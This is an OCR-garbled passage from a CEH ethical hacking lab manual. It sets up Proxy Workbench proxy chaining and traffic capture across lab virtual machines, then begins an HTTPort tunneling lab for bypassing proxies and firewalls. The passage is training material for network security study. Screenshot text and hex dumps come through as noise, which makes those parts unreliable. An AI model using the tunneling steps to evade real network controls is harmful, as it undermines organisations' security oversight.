f t The sockets panel shows the number o f Alive socket connections that Proxy Workbench is managing. During periods of no activity this will drop back to zeroSelect Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 213
Module 03 - Scanning Networks 8. Check Manual proxy configuration 111 the Connection Settings wizard. 9. Type HTTP Proxy as 127.0.0.1 and enter die port value as 8080‫י‬ and check die option of U se this proxy server for all protocols, and click OK. Connection Settings Configure Proxies to Access the Internet 8080— 8080y | 8080v Port Port Port PorJ: O No prox^ O Auto-detect proxy settings for this network O iis* system proxy settings (§) Manual proxy configuration: HTTP Proxy: 127.0.0.1 @ Use this proxy server for all protocols SSL Proxy: 127.0.0.1 £TP Proxy: 127.0.0.1 SO£KS Host 127.0.0.1 D SOCKSv4 (S) SOCKS^5 No Proxy for localhost, 127.0.0.1 Example .mozilla.org, .net.nz, 192.168.1.0/24 O Automatic proxy configuration URL Rgload HelpCancelOK FIGURE 13.3: Firefox Connection Settings 10. While configuring, if you encounter any port error please ignore it 11. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop. 4 WindowsServer2012 WaoomW1PiW2(dentCjiCkttr0HiKtTr baLMcncowtuidMO. g. - ?• FIGURE 13.4: Windows Server 2012 - Desktop view 12. Click die Proxy Workbench app to open die Proxy Workbench window S The status bar show s the details of Proxy Workbench*s activity. The first panel displays the amount of data Proxy Workbench currently has in memory. The actual amount of memory that Proxy Workbench is consuming is generally much more than this due to overhead in managing it. Scan computers by IP range, by domain, single computers, or computers, defined by the Global Network Inventory host file Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 214
Module 03 - Scanning Networks Server M anager W indows PowerShell G oogle Chrom e Hyper-V M anager Fa m • ‫וי‬ Control Pand W Hyper•V Virtual M achin e ‫״‬ S O I Server £ Com m and Prom pt M O? 113 Firefox Searct101_ H O D etk c d o b a I Netw ork Inventory Si Proxy Woricbenu. FIGURE 13.5: Windows Server 2012 - Apps 13. The Proxy Workbench main window appears as shown in die following figure. H IProxy Workbench m File View Tools Help ‫ם‬ ‫ו‬ _‫ש‬‫ב‬‫ע‬ K N J H mDetails for All Activity 1 Protocol | StartedToFrom 173.194.36.24:80 (www.g.. HTTP 18:23:39.3^ 74.125.31.106:80 (p5 4ao HTTP ‫־‬18:23:59.0 173.194 36 21:443 (maig HTTP 18:24:50.6( 173.194.36.21 :443 (m aig. HTTP 18:24:59.8' 173.194.36.21:443 (maig.. HTTP ‫־‬18:25:08.9 1 7 ‫ר‬ K M TC.71 • A n (m ‫־‬d ‫״‬ H T T P ____ 1Q .T C .1Q M JJ127.0.0.1:51199 127.0.0.1:51201 J l l 127.0.0.1:51203 J d 127.0.0.1:51205 J d 127.0.0.1:51207 W 'l!?7nn 1‫ו‬ ^ ‫ו‬ ‫ל‬ ‫ו‬ Mooitorirg: WIND33MR5HL9E4 (10.0.0.7) SMTP •Outgoing e-mal (25) ^ POP3 •Incoming e-mail (110) & HTTP Proxji •Web (80B0) HTTPS Proxy •SecureWeb (443) ^ FTP •File T!ansfer Protocol (21) Pass Through ■For Testing Apps (1000) 3eal time data for All Activity J 0 0 0 0 3 2 / I . 1 . . U s e r —A g e n t 2 f 3 1 2e 3 1 Od 0 A S S 7 3 0 0 0 0 4 8 : M o z i l l a / 5 . 0 ( ¥ 3a 2 0 4d S i 7 a 6 9 6 c 6 c 0 0 0 0 6 4 i n d o w s N T 6 . 2 ; W 6 9 6 e 6 4 6 £ 7 7 7 3 2 0 4 e 0 0 0 0 8 0 O U 6 4 ; r v : 1 4 . 0 ) G 4f 5 7 3 6 3 4 3 b 2 0 7 2 7 6 0 0 0 0 9 6 e c k o / 2 0 1 0 0 1 0 1 F i 6 5 6 3 6 b 6 f 2 f 3 2 3 0 3 1 0 0 0 1 1 2 r e f o x / 1 4 . 0 . 1 . . P r ? 2 b5 6 6 6 f 7 8 2 f 3 1 3 4 0 0 0 1 2 8 o x y - C o n n e c t i o n : 6 f 7 3 7 9 2 d 4 3 6 f 60 6 e 0 0 0 1 4 4 k o o p - a l i v o . H o s t 6 b 6 5 6 5 7 0 2 d 6 1 6 c 6 9 0 0 0 1 6 0 : m a i l . g o o g l e . c o 3a 2 0 6d 6 1 69 6 c 2 e 6 7 , 0 0 0 1 7 6 m . . . . 6d O d 0o O d 0 a < III > 7angwrrx?n— Luyymy. u n ;1.un ; 1 iciu ic . un ; 11Memory: 95 KByte Sockets: 1CO Events: 754 FIGURE 13.6: Proxv Workbench main window 14. Go to Tools on die toolbar, and select Configure Ports S The events panel displays the total number of events that Proxy Workbench has in memory. By clearing the data (File‫>־‬Clear All Data) this will decrease to zero if there are no connections that are Alive & The last panel displays the current time as reported by your operating system Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 215
Module 03 - Scanning Networks Proxy Workbench U- 3 L^oolsJ Help Save Data... =tails forAll Activity m n i h m |10m | T0 I Protocol | Started ^ Configure Ports. 173.194.36.24:80 (w»w*.g.. HTTP 18:23:39.3} 74.125.31.106:80 |pt4ao HTTP ‫־‬18:23:59.0 173.194 36.21:443 (naig. HTTP 18:24:50.6( 173.194 36.21:443 (na*g HTTP 18:24:59.8! 173.194 36 21:443 (naig HTTP ‫־‬18:25:08.9 »‫*י׳ו‬‫ו‬n*‫״‬‫ול־‬c‫*־‬1m• HTTP ■ m -wipr J 127.0.0.1 tJ 127.0.0.1 3 d 127.0.0.1 £ J 127.0.0.1 ;jd 127.0.0.1 ‫ל‬ ‫ו‬‫ו‬511‫וו‬‫ח‬7- |‫ו‬‫ל‬4 > File View I 5 Monitoring: W All Activity 51199 51201 51203 51205 51207 Failure Simulation... ^ SMTF Real Time L°99in9 • POPd Options... k # HTTP T‫־־‬TWny T T W U (W W ) ^ HTTPS Proxy •Secure Web |443) ^ FTP •File Transler Protocol (21) Pass Through ■For Testing Apps (1000) Real time data for All Activity 0a 55 73 69 6c 6 c ?3 20 4e 20 72 76 32 30 31 2 f 31 34 6 f 6e 6e 61 6c 69 6 c 2e 67 31 Od 6 f 7a 6 f 77 34 3b 6 £ 2 £ 6£ 78 2d 43 70 2d 61 69 Od 0a 2£ 31 2e 3 a 20 4d 69 be 64 4£ 57 36 65 b3 6b 72 65 66 6 f ?8 79 6b b5 65 3a 20 6d 6d Od 0a / l . 1 . .U s e r - A g e n t : M o z i l l a / 5 . 0 (W in d o w s NT 6 .2 ; U OU64; r v : 1 4 . 0 ) G e c k o /2 0 1 0 0 1 0 1 F i r e £ o x / 1 4 . 0 . 1 . P r o x y - C o n n e c t io n : k e e p - a l i v e . . H o st : m a il. g o o g le . c o m .... 0 0 0 0 3 2 0 0 0 0 4 8 0 0 0 0 6 4 0 0 0 0 8 0 0 0 0 0 9 6 000112 0 0 0 1 2 8 0 00144 0 0 0 1 6 0 0 0 0 1 7 6 I eiiim a ic UII 11c1u4c. uu u nuuic u ii L‫׳‬ «ty1c u n 1_<.yymy. u n ‫׳‬ j u iMemory: 95 KByte Sockets: 100 Events: 754 FIGURE 13.7: Proxy Workbench ConFIGURE Ports option 15. 111die Configure Proxy Workbench wizard, select 8080 HTTP Proxy - Web 111 die left pane of Ports to listen on. 16. Check HTTP 111 die right pane of protocol assigned to port 8080, and click Configure HTTP for port 8080 Configure Proxy Workbench Protocol assigned to port 8080 Proxy Ports Ports to listen on: Don't use>>; ✓■: Pass Through □HTTPS □POP3 FTP‫ח‬ Port [ Description 25 un SMTP • Outgoing e-mail PI‫־‬lP3 -lnnnmino ft-maiI 18080 HTTP Proxy ■Web 443 HTTPS Proxy ‫־‬SecureWeb 21 FTP ‫־‬File Transfer Protocol 1000 Pass Through ■Foe Testing Apps &dd- | Qetete | | Configure HTTP tor poet 8080.| CloseW Sho^ this screen at startup FIGURE 13.8: Prosy Workbench Configuring HTTP for Port 8080 17. The HTTP Properties window appears. Now check Connect via another proxy, enter your Windows Server 2003 virtual machine IP address 111 Proxy Server, and enter 8080 in Port and dien click OK & The *Show the real time data window' allows the user to specify whether the real-time data pane should be displayed or not CLl People who benefit from Proxy Workbench Home users who have taken the first step in understanding the Internet and are starting to ask "Bat how does it work?” People who are curious about how their web browser, email client or FTP client communicates with the Internet. People who are concerned about malicious programs sending sensitive information out into the Internet. The information that programs are sending can be readily identified. Internet software developers who are writing programs to existing protocols. Software development for die Internet is often verv complex especially when a program is not properly adhering to a protocol. Proxy Workbench allows developers to instantly identify protocol problems. Internet software developers who are creating new protocols and developing the client and server software simultaneously. Proxy Workbench will help identify non-compliant protocol :- T-1-■> Internet Security experts will benefit from seeing the data flowing in real-time This wiH help them see who is doing what and when Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 216
Module 03 - Scanning Networks ^ Many people understand sockets much better then they think. When you surf the web and go to a web site called www.altavista.com, you are actually directing your web browser to open a socket connection to the server called "www.altaviata.com" with port number 80 FIGURE 13.9: Prosy Workbench HTTP for Port 8080 18. Click Close in die Configure Proxy Workbench wizard after completing die configuration settings The real time logging allows you to record everything Proxy Workbench does to a text file. This allows the information to be readily imported in a spreadsheet or database so that the most advanced analysis can be performed on the data 19. Repeat die configuration steps of Proxy Workbench from Step 11 to Step 15 in Windows Server 2008 Virtual Machines. Configure Proxy Workbench Protocol assigned to port 8080 □ <Don't use>___________ □ Pass Through □ HTTPS □ POP3 Configure HTTP for pent 8080 Proxy Ports 3orts to listen on: Port | Description SMTP • Outgoing e-mail POP3 ‫־‬Incoming e-mail HTTPS Proxy-Secure Web FTP ‫־‬ File Transfer Protocol deleteAdd Close 25 110 8080 HTTP Proxy -Web 443 21 1000 Pass Through - For TestingApps □FTP W Show this screen at startup FIGURE 13.10: Proxv Workbench Configured proxy HTTP Properties General C On the web server, connect to port: (• Connect via another proxy Proxy server |10.0.0.7| Port: Iftfififi CancelOK Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 217
Module 03 - Scanning Networks 20. 111Windows Server 2008 type die IP address of Windows 7 Virtual Machine. 21. Open a Firefox browser in Windows Server 2008 and browse web pages. 22. Proxy Workbench Generates die traffic will be generated as shown in die following figure of Windows Server 2008 23. Check die To Column; it is forwarding die traffic to 10.0.0.3 (Windows Server 2008 virtual Machine). McnfanjMN1r2CtU.20010|43‫־‬;‫|׳‬ A‫«־־‬•‫=-׳‬‫־‬ UK -*<o»e£ 577‫ז‬ <V13r>M4ca1facc tWJ 1556 r»9rM 0(a<rM . ‫מו‬ ‫נ‬ 1191 2110 I’JK *v«**<*3ntrr»»t 3(85 IVJ ;v» » . < * < * 1 1 9 9 . * ‫״‬ *AttkaacaiNMt I3S h■■aita ‫׳‬‫״‬•a 1Wi PAthtf<ka»Mcc FV»9hn<*co<ra<t 06.K2S.31T ‫סט‬?05206 06052C92? 06®274B 06052*16? utre^riTO KKrT K05267W arezrui 6»‫י‬‫י‬.05» KT ,s z a 0IB?W 060527*3 HB700 ;‫י‬»‫י‬‫י‬05» ««27» De«r?«e 06052»»l ‫ת‬2 1120►«•*»«‫*׳״‬■*9‫»ה‬ 06052*173 sauszs t£3524:45 3‫י‬3•05206 ‫זמ.גג‬105» ce0525&43 « 052*100 «0521102 ®0526217 KOI.2t.3K ccosjt*1 (SOS?MBtiiir, :1 4r, « 052(.734 n n ;1 19, »11!»r (C05:?(CT tSOlJMM »0J2n01ct012733 M0*27 411 160527496 £605275.* *05 2759? (6052702 3‫ט‬27££05 C605275S7 wanton1aaa1 aca! laooitCMmaiaxo 1000 )•CB) Mtaiaon taaa‫ו‬•cm 10011 > rw ra a a ira M00 )•CIO laaaiKm 100a )■m taaaiacta M00 )•CM MaaiKHi 144a]•QM 1000)«:w laaaiaao Mtaianlaaaiaxa uaaiaceo lOOOKW 7‫ל‬0 vr.u -‫י‬ 11 ‫׳‬ ‫*.־־‬*» fJ'•U ‫י‬1> .‫«־‬u:‫«־‬11.41• •I .‫נ‬1> ‫י‬1> :‫נ־‬11 ‫י‬■•11 .‫נ‬U •1.* 1—2 | MAOAOy ^ ship 0.*!>> ‫ן‬ ‫מ‬1‫ו»*<»׳‬ ^1CQC•) I.(flff J'.f'AIBI'/tllilUII y HT‫ז‬ ‫מ‬ F W -Sioim W.b (4431 6 FTp.Fteriattfa *<xo:d|71) Vp*m111*h11-f«r»»njA«c*no30) Sf <4 20«(30II 31 ro 0‫נ‬ 4c 11 7i ?2 W 2c 32 3d 3» (3 U K 3d 41 k- <3 74 (1 «} MH 31303220 •041;4u >>203864 0?»31030 1113Od Qo 716120«d bI «m Cm?< *7$‫י‬61tC 2010 30 78 70 63 4d £1 72 39 30 47 65‫י‬666 7420 32 47 Id 14 t l Ic 3a Od 0 . 43 450‫ל‬M •0(448 1 (0 17 34 <3TT 31 •00D&4 E x te rn Sot 26 45 •a[csc •0C112:■«)‫די‬0• 141]‫׳‬3C 00160• on<?• 2?>5d 5200S .. : : t l a ir 1 u > - ) u‫י‬4 023.tf 1«J F ri 4•100.'‫י‬1*2«c 3n :•dta-Caat> 0«3:>c : .J i-a g e FIGURE 13.11: Proxy Workbench Generated Traffic in Windows Server 2012 Host Machine 24. Now log in in to Windows Server 2008 Virtual Machine, and check die To column; it is forwarding die traffic to 10.0.0.7 (Windows 7 Virtual Machine). Fife View Tod* Hrip Mirilcrrfj y1cbncni<2(’.3|10Q0 3| r**»h':1HTIPPn»y‫'־‬Veb(0C8]) d T r d 1 1 S te M | 1■.,* 1•.f ‫״‬I K £J*)O O G «fflO 1000701 CO HTTP 05 flfl 0^7 3‫ג‬ or, 05 4n !00 F 4J10.QO.6SWO 1ao.a?;»80 H U P 06.05 40109 061*41156 K jU ': a : f c 3 1 i4 lQ 0 D ;-m m H U P (E tft * 6 9 ‫נ‬‫נ‬ 1)• (h 41 070 F £ J '] . 0 0.69615 1aoa7.83E0 HTTP 06.(E *3 375 CB OG■41 625 F £ J 6 ; 0 : ‫־‬ s n t : ‫נט‬ ‫ש‬0700‫ו‬ H U P (£0 6 41437 (COS 41 015 F £ J 1 0 0 06 9819 100 07:83EO HTTP 0506 *3 531 (C 05 41 281 F £ J 1 a a 0.6 9620 100.07:8360 HTTP 06.05 4Q 546 06.05 41.281 F jh J 'I Q0.&9B22 1aoa7!mE0 HTTP 0E<E 4a 578 05 05 40 B43 F £ | - : . 0 : . 6 5824 1a0.a7:83EO HTTP 060=4:655 06 05:41.828 F £110.00 69626 :‫ש‬ ‫ש‬0 0 0 7‫ו‬ HTTP 06 05*3 906 (KOS415Q3 F £ 1 10 00 69 82 8 1000.7:8303 HTTP 06<e 41015 06 05 41 406 F £ 1 *1 0 0 .6 9830 1ClO.a7.83EO HTTP 06.0C 41 *09 06 05 41 718 F £1 1 0 0 0 &9H32 m on7rm go H U P (K ffi 41 TIB O, (h 41 ‫׳׳‬HI Fj *1 1 2J 9 ^ ,iMTP•IJ1*yt«nyvm«1l(2&| POP3 •IruMfiinjoniilplCI Qwpnmamm■H 1QOQ2I0 1QQQ7 &10.00.6!0100.0? HITP5 Ro«v -Seojic Web(4431 " W FTP ■Fie 1lend® FVolard |211• Nol L ila PdssThioj^i F01 Tastro^oo*nOOOl f« a ?‫פ‬ ffe d cMs tei Hr TP Ptcay •V/H3 |B0B]| 7420S3 i l 312030303a 4?.rf‫ל‬73614 r 3220?2b'3 2c 3031.‫י‬33032 63 b0 65 2d ■(3 2d 61 6? 65 3d 63 74 69 b l 6 • 65 Od 0o Od 0o 76 70 69 72 65 73 3c 4d 61 72 20 32 30 31 39 20 47 <d 64 Od 0« 66 69 6564 20 1e 74 20 32 30 30 39 20 47 4d Od G« <3 61 6t 6 c 30 20 6d 61 78 Od 0 9 43 61 t e in 15 65 70 2d 61 6c 69 6‫ל‬ S xp iro D S ot 26 Hnx 20110aG2<0 CUT T.m t Hrd f t 1. 23 0 c t 2009 2 0 •10 04 GMT. . C»ch0-C011t ro L m ax-oge-360 0 . Connect io a k o e p - o liv c 064: ‫״‬ 010080 *0 9‫־‬ ‫־‬ ‫־‬ 060112 0 0012C 060144 060160 060176 080192 T»!mnale 01( RcIlbc Qr 'hrb»f‫־‬ C m ^ !‫׳‬ CK -oggrg 01( 613AM 6:15AT1‫׳‬ Mara y 3ES KBylei J Start | Proxy Worfctxfyh AiLd FIGURE 13.12 Proxy Workbench Generated Traffic in Windows Serve! 2003 Virtual Machine & Proxy Workbench changes this. Not only is it an aw esom e proxy server, but you can se e all of the data flowing through it, visually display a socket connection history and save it to HTML £ 7 And now, Proxy Workbench includes connection failure simulation strategies. What this means is that you can simulate a poor network, a slow Internet or unresponsive server. This is makes it the definitive TCP application tester Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 218
Module 03 - Scanning Networks 25. Select On die web server, connect to port 80 in Windows 7 virtual machine, and click OK -TTTP P ro p erties G eneral | (• O n the * tcb server, co n n e ct to port: C " C on n ect v b 0T0*her proxy Pro<y :errer 110.0.0.5 Port: [fiflffi OK i l C«r>cd HI It allows you to 'see' how your email client communicates with the email server, how web pages are delivered to your browser and why your FTP client is not connecting to its server FIGURE 13.13: Configuring HTTP properties in Windows 7 26. Now Check die traffic in 10.0.0.7 (Windows 7 Virtual Machine) “TO” column shows traffic generated fiom die different websites browsed in Windows Server 2008 " Unix ‫צ&ו‬7‫הו‬ p i? w a » '*wts c « > » w W d iso « > • <§>o 11 1► ;>■ r*e VWwr Toeli Help &!‫•ג&ל‬‫־‬£< D cU I1taH TTPIW -W «b 180801 m i l ► From ‫:י‬­ Pidocoi I |U * E -* rl 1 LMlSUto B/*5 C25 1 BylesS *010.0 D32237 <.26E0 I1:..h‫ד‬3.*.‫גן‬ H U P 06:0634.627 06.C635.436 FV»Bho? dfOcmecC.. 1577 0 )0 1 0 0 0 32239 •571SS22G.aK:£0|adi HTTP 0&£634643 CE<62SG3 fVt'B hai d ;c f r r « l 1555 0 )8 1 0 0 0 3 2 2 3 9 &‫»*<י‬0»78206126‫י‬ * HTTP C6(634666 06(636390 P*J»3 l « J i « r r « l ... 1556 0 ;0 1 0 0 0 3 2 2 4 0 i3 8 7 8 2 0 S 1 2 6 £ 0 (a h t HTTP (6:0634.836 06(635624 f*■‫״‬? t e d t a r r e d . 1950 0 )0 1 0 0 0 32241 133 73 336126.tC |ic‫*־‬U HTTP 060634.336 060636624 FV»Bh n J ‫־‬.ccrreO... 1131 0 ) 0 10 0 0 3 2242 2027921012140(t*K1 HTTP C&C634963 c ec & x 2 1 e Km d : « r r « l 2110 0 5 0100032243 57‫י‬ iffi 2262(68(U*te HTTP (6(6S6(E3C (6(636186 4176 0 ) 0 10 0 0 32244 56 ZJ5 14311l&C0lme*c h i TP CC.Ct.X.X^ C60&X3W FWB hat d n c r m l . 2710 0 )0 1 0 0 0 3 2245 201l0&9517&a>fd»1e1 HTTP 0 f e » 354 » CM & XTtS hat d if f rr w l 1572 112 )B 10 0 0 3 224S 1-: ►1. ‫־‬‫׳‬,‫־‬ I..: HI TP 06:0636483 (6 (C!36 (66 ‫י‬‫וי‬ 0 )010 00 22‫נ‬c '» r a 2 0 5 1 2 e w 0 a * u HI IP 06C03BW3 c u r * 1 2 4 f .« ‫׳‬J n c r r « l 11« 0 )610 0 0 3 2 2 9 1 » 7 8 a * 1 2 M 0 |l« h t.. H U P CC.CVXUC 0C.CtX.4V• rv>V bm d iw riK l... IA» 0 ) 0 10 0 0 3 224) 1 9 1vV..'X.;fflT11^1. HTTP flf.r»3570? f f . f f T V ►V.T1 dtecrreel 3‫ט‬2 0 ',W10 0 0 3 2250 1«7820612S8000< ht H U P t e a . 56 786 . • > P*8 tuadK crrec1... 1183 0 ) 0 10 0 0 32251 ,. ‫״‬ : . • . . ! . u u ‫־‬ .. h i IP 060U36W9 06C6 XU>1 1 8 ‫י‬‫״‬ h o d im r M l. 2103 0 )01OOO 322C •57166 2® 16£0 (wmm.... HTTP c tc e -x c 7 ? ttC fiX f ® M Km • iitfr r f fl 5.‫»י‬ 0 ‫־‬M 1000 3 2253 826 >2» « 81:6 ‫י‬ a h (u HTTP (6:0636124 06(636718 3333 0 )010 0 0 3 2 2 5 4 '38JB20612t<a)|iCT*U HI TP C6:Cfc36.166 C6C63E7*9 8 *‫יי‬ hoj 4 1 « ff« l.. 2125 398 ) 0 10.0.0 32255 •3873206126t01icdn.. HTTP 0606X 216 06.0636611 F h o ! dtccrrccC.. 2421 0 )01O O O 322S •3a7320£1;&£C|1‫־‬«fce HTTP CfcC&XSCS <£ffiX fi27 PV.‫־‬Bhatiicerrcct.. 112i 0 )0 1 0 0 0 3 2257 ‫־‬i» 7 8 2 0 6 l2 6 0 H ic eh t HTTP 06*636396 (6 (6 3 6 8 (6 P*v»8 1120 0 )010.0.0.32258 157.165Z262C6e0l«fc HTTP 06C636606 060637.436 FVjB h s d.ccrrecl... 1533 0 nfl. Vicim-iTnaOLCLTl _L*a 65 ? 0 7 4 2 d 4 61 3 6 ‫־‬.‫־‬‫ג‬ SO 3 a 2 0 4 3 5 0 3d 22 40 i f ? 5 S2 2 0 42 5? 53 20 74 6 5 3 • 2 0 5 3 ( 1 74 2c 32 30 31 31 2 0 30 30 3a ? 4 011 0 a 4 ) i i 6e ( e 65 &c Cl ? 3 6 5 C J 0■ 43 i l 303220*36 84‫ל‬6 760 61 72 75 3a 20 41 63 63 M 69 60 6? Od 0a 60 33 4 f i l 20 id 4? 56 61 20 55 4 e 4? 22 Od 0» 44 61 20 32 36 20 4d 61 ? 2 20 3S 32 3a 33 31 20 47 4d 61 74 6? 6( 6■ 3 • 20 6) 60 ?4 65 6a ?4 2d 4c 65 C‫־‬S I 3 0 l« 5 e l. 26 b a r 2011 00 52 31 CUT Conn* c t * o c . : ! » • . Co Btwt-Uimh 20 000160 0001 7 6 000192 000206 000224 000240 000256 0002 7 2 f t All«5ctr»*y ^ SMTP -Ouiflonfl e ‫״‬id |25| peal line dsis t i HTTP P * •/ ■Web (9060) ‫ד‬ClClCl3 to 10 0 0 5 1a a a 3 h>203.85.231.83 |m‫־‬j.Brc> ’ 00031# 68 71 209 176 |abc goc 100031a 50 27 06 207 |edn>m)k| 1a a a 3 la 58.27.86.123 ledue qua 100031a 68 71 220 165 |abc cm 100031a 202 79 210 121 Ibi tav 1QOCl3 b1205 128 84.126 l£«to 100031a 50 27 86 105 |f« * 1ur 100031a 58 27 86 217 100031a 157 166 255 216 |4d1‫׳‬c 100031a 157 166 255 31 imiiv, 100031a 203 85 231 148 lilt 100031a 203 106 85 51 |b kcmc 100031a 50 27 06 225 |s etrrcd 100031a 157.166.226.26 Iw m c 100031a 199 93 62 126 |i2.«*u 100031a 203.106.85.65 liFc.^r 100031a 207 46 148 32|vi*va(£ 100031a 66 235 130 59 Ix-ffccm 10.0031a 203.106.85.177 Ib.scc‫״‬ 100031a 0 26 207 126 ledn vrtt 100031a 157 166 226 32 |tve±a 100031a 58 27 22 72 |r.«*h4m 100031a 190 70 206 126 |icchk 100031a 157 166 226.46 ledlnr^ 100031a 66 235 142 24 |rre41b)< 100031a 203 106 05 176 Idi Mrw 100Q3 I1 157.166.255.13 Immma 1000310 68 71 209173 |4bc fl0< 12L Q2In the Connection Tree, if a protocol or a client/server pair is selected, the Details Pane displays the summary information of all of the socket connections that are in progress for the selected item on the Connection Tree. FIGURE 13.14: Prosy Workbench Generated Traffic in Windows 7 Virtual Machine Lab Analysis Document all die IP addresses, open ports and running applications, and protocols you discovered during die lab. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 219
Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved Proxy W orkbench Proxy server Used: 10.0.0.7 Port scanned: 8080 Result: Traffic captured by windows 7 virtual machine( 10.0.0.7) P L E A SE TALK T O YOUR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D TO T H I S LAB. Questions 1. Examine the Connection Failme-Termination and Refusal. 2. Evaluate how real-time logging records everything in Proxy Workbench. Internet Connection Required 0 Yes □ No Platform Supported 0 Classroom □ iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 220
Module 03 - Scanning Networks HTTP Tunneling Using HTTPort HTTPo/f is aprogramfrom HTTHosf thatmates a transparenttunnelthrough a pm xj servero rfrenal! Lab Scenario Attackers are always in a hunt for clients that can be easily compromised and they can enter these networks with IP spoofing to damage or steal data. The attacker can get packets through a firewall by spoofing die IP address. If attackers are able to capture network traffic, as you have learned to do in the previous lab, they can perform Trojan attacks, registry attacks, password hijacking attacks, etc., which can prove to be disastrous for an organization’s network. An attacker may use a network probe to capture raw packet data and then use this raw packet data to retrieve packet information such as source and destination IP address, source and destination ports, flags, header length, checksum, Time to Live (TIL), and protocol type. Therefore, as a network administrator you should be able to identify attacks by extracting information from captured traffic such as source and destination IP addresses, protocol type, header length, source and destination ports, etc. and compare these details with modeled attack signatures to determine if an attack has occurred. You can also check the attack logs for the list of attacks and take evasive actions. Also, you should be familiar with the HTTP tunneling technique by which you can identify additional security risks that may not be readily visible by conducting simple network and vulnerability scanning and determine the extent to which a network IDS can identify malicious traffic within a communication channel. 111this lab you will learn HTTP Tunneling using HTTPort. Lab Objectives This lab will show you how networks can be scanned and how to use HTTPort and HTTHost Lab Environment 111die lab, you need die HTTPort tool. I C O N K E Y Valuable information Test your knowledge 3 Web exercise Q Workbook review’‫׳‬ Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 221
Module 03 - Scanning Networks ■ HTTPortis located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksTunneling ToolsHTTPort ■ You can also download the latest version of HTTPort from die link littp:/ Avww.targeted.org/ ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ Install HTTHost 011 W indows Server 2008 Virtual Machine ■ Install HTTPort 011 Windows Server 2012 Host Machine ■ Follow the wizard-driven installation steps and install it. ■ Administrative privileges is required to run diis tool ■ This lab might not work if remote server filters/blocks HTTP tunneling packets Lab Duration Time: 20 Minutes Overview of HTTPort HTTPort creates a transparent tunneling tunnel dirough a proxy server 01 firewall. HTTPort allows using all sorts of Internet Software from behind die proxy. It bypasses HTTP proxies and HTTP, firewalls, and transparent accelerators. Lab Tasks Before running die tool you need to stop IIS Admin Service and World Wide Web Publishing services on Windows Server 2008 virtual machine. Go to Administrative Privileges Services IIS Admin Service, right click and click the Stop option. 01 HTTPort creates a transparent tunnel through a proxy server or firewall. This allows you to use all sorts of Internet software from behind the proxy. Stopping IIS Services 2 . £ " Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 222
Module 03 - Scanning Networks Ka-n- * I CeKri3bcn | 5:«b_s '*,FurcBon Discovery Provide Host N w ta o c e.. , Stated P-rcocn Decovery Resource P J> l3ten P -behes t... Started -C^C-rOiP Poicy C en t The serve... Started Key a id Cerbftrate Mens9»trp-t P‫־‬ovde* X... £,hjm a1 ir te 'f c • Devise Attest E-ajtet os 3 .* v o r •v m u txchanoa s w a P 0 ‫־‬vd81 a .. . Started 1Cfcnyoer-v Gue»t Shutdown Se‫׳‬ v»oe fvovdes a .. . Started ■S^Hyp*r*VHurBjMt 5 n v c » M o'ibn th.. t*d‫׳‬5 la. '^,hvsf'-v Tir* Synctvonm to ' S a v e • Syrxh'Cnj.. 5:*U d ‫'־׳‬• x ‫׳‬ « voiuneShjaowCoovRM uM Br coctdn jte . _ 1 u ‫־׳‬ted ‘ £ , 3 2 a‫־־‬d Au0!:P !P t•: Ktyttg ModJ«t CfeInteracave services Detection S tJ t__________ St* lid 4 Internet Cornecton Shwrng CCS) • £ !P h d p ‫־‬f £ ,:P sec Polcy Agent P.-llv jn ... Res- r e R essrr S lated . Stated ‫־‬J kctR.t1*cr 3£trbuted Tra-samon Coordnsso£: AITmks ►3te , Started ^ I n it-to v e ‫־׳‬Tosoocv Discovery 1“tepee- ...0‫־‬----- ?iw icroajft KETFrans0‫״‬ rk NGB< v3 0.50727_kfr■ R£^G^1 Sia-ted ^.M toosoft .KCTFraiKWOrkNS&l v : 0.50727_>« Proprf br% t .... Stated '■*,M 0090* Fbre channel ?Istfo'n R e3 st3 ‫»־‬ n Se‫״‬ 8‫־‬ t.. w b , ‫ן‬^ Mictom4?6CSI ]ntigtor Service ^ V b o n * ! 5 ‫כ‬) | ‫י‬ »‫ז‬ Shacton Copy P 'ordfi W r a g n «... Q,M0Jla M anttnaioa S w vct ‫•ויז‬ Mojll*.. J IIS Admin Scrvict Sioo th- service 5.estart t h e se v c e D ocrpton: Enabltc 6 « ‫־‬11‫י‬ >« to *d1‫־‬nvj!t‫•־‬ ::s ‫יי־‬‫׳‬‫׳‬ » : « * « « H5 ‫׳‬X 'J tK C »r*ou‫׳‬M10n *or‫«ימ‬ SK*®one FTP 1*rvior* th u m v te • ttauprd. :‫»־‬ i«‫׳‬v«' nil 2* u 1«6* to amfg.«« S-—3or ftp. :, the servce e dsxcd. an, s e 1 /‫׳׳‬ee* *v 9 !t» p o rv dfpeo; * m I faI to tU t t. >t:p jcrvce IL Acrrr S trVtt on loco CaiOutt* FIGURE 14.1: Stopping IIS Admin Service in Windows Server 2008 3. Go to Administrative Privileges Services World Wide Web Publishing Services, right-click and click die Stop option. -Tllx] *te Action jjen tela N + l t w l ‫י‬‫ר‬ A l-' I B rrfE f [ > 